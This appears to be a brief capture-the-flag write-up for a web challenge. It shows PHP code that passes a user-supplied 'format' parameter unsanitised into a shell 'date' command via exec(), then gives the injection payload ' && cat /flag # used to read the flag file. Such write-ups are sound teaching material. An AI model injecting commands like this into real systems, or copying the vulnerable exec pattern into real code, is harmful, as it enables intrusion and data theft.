If we click on whatโs the date/time we get it, so itโs time to analyze the source code:
If we analyze the Dockerfile, it seems that the flag is being copied in /flag
If we inspect the controllers
folder, we find TimeController.php
class TimeController
public function index($router)
$format = isset($_GET['format']) ? $_GET['format'] : '%H:%M:%S';
$time = new TimeModel($format);
return $router->view('index', ['time' => $time->getTime()]);
This controller calls a model inside models
subfolder, so letโs inspect TimeModel.php
class TimeModel
public function __construct($format)
$this->command = "date '+" . $format . "' 2>&1";
public function getTime()
$time = exec($this->command);
$res = isset($time) ? $time : '?';
return $res;
We can espace the command of the construct function by appending a ' #
, so we can read the content of /flag
by altering the petition with burp using the payload (url encoded): ' && cat /flag #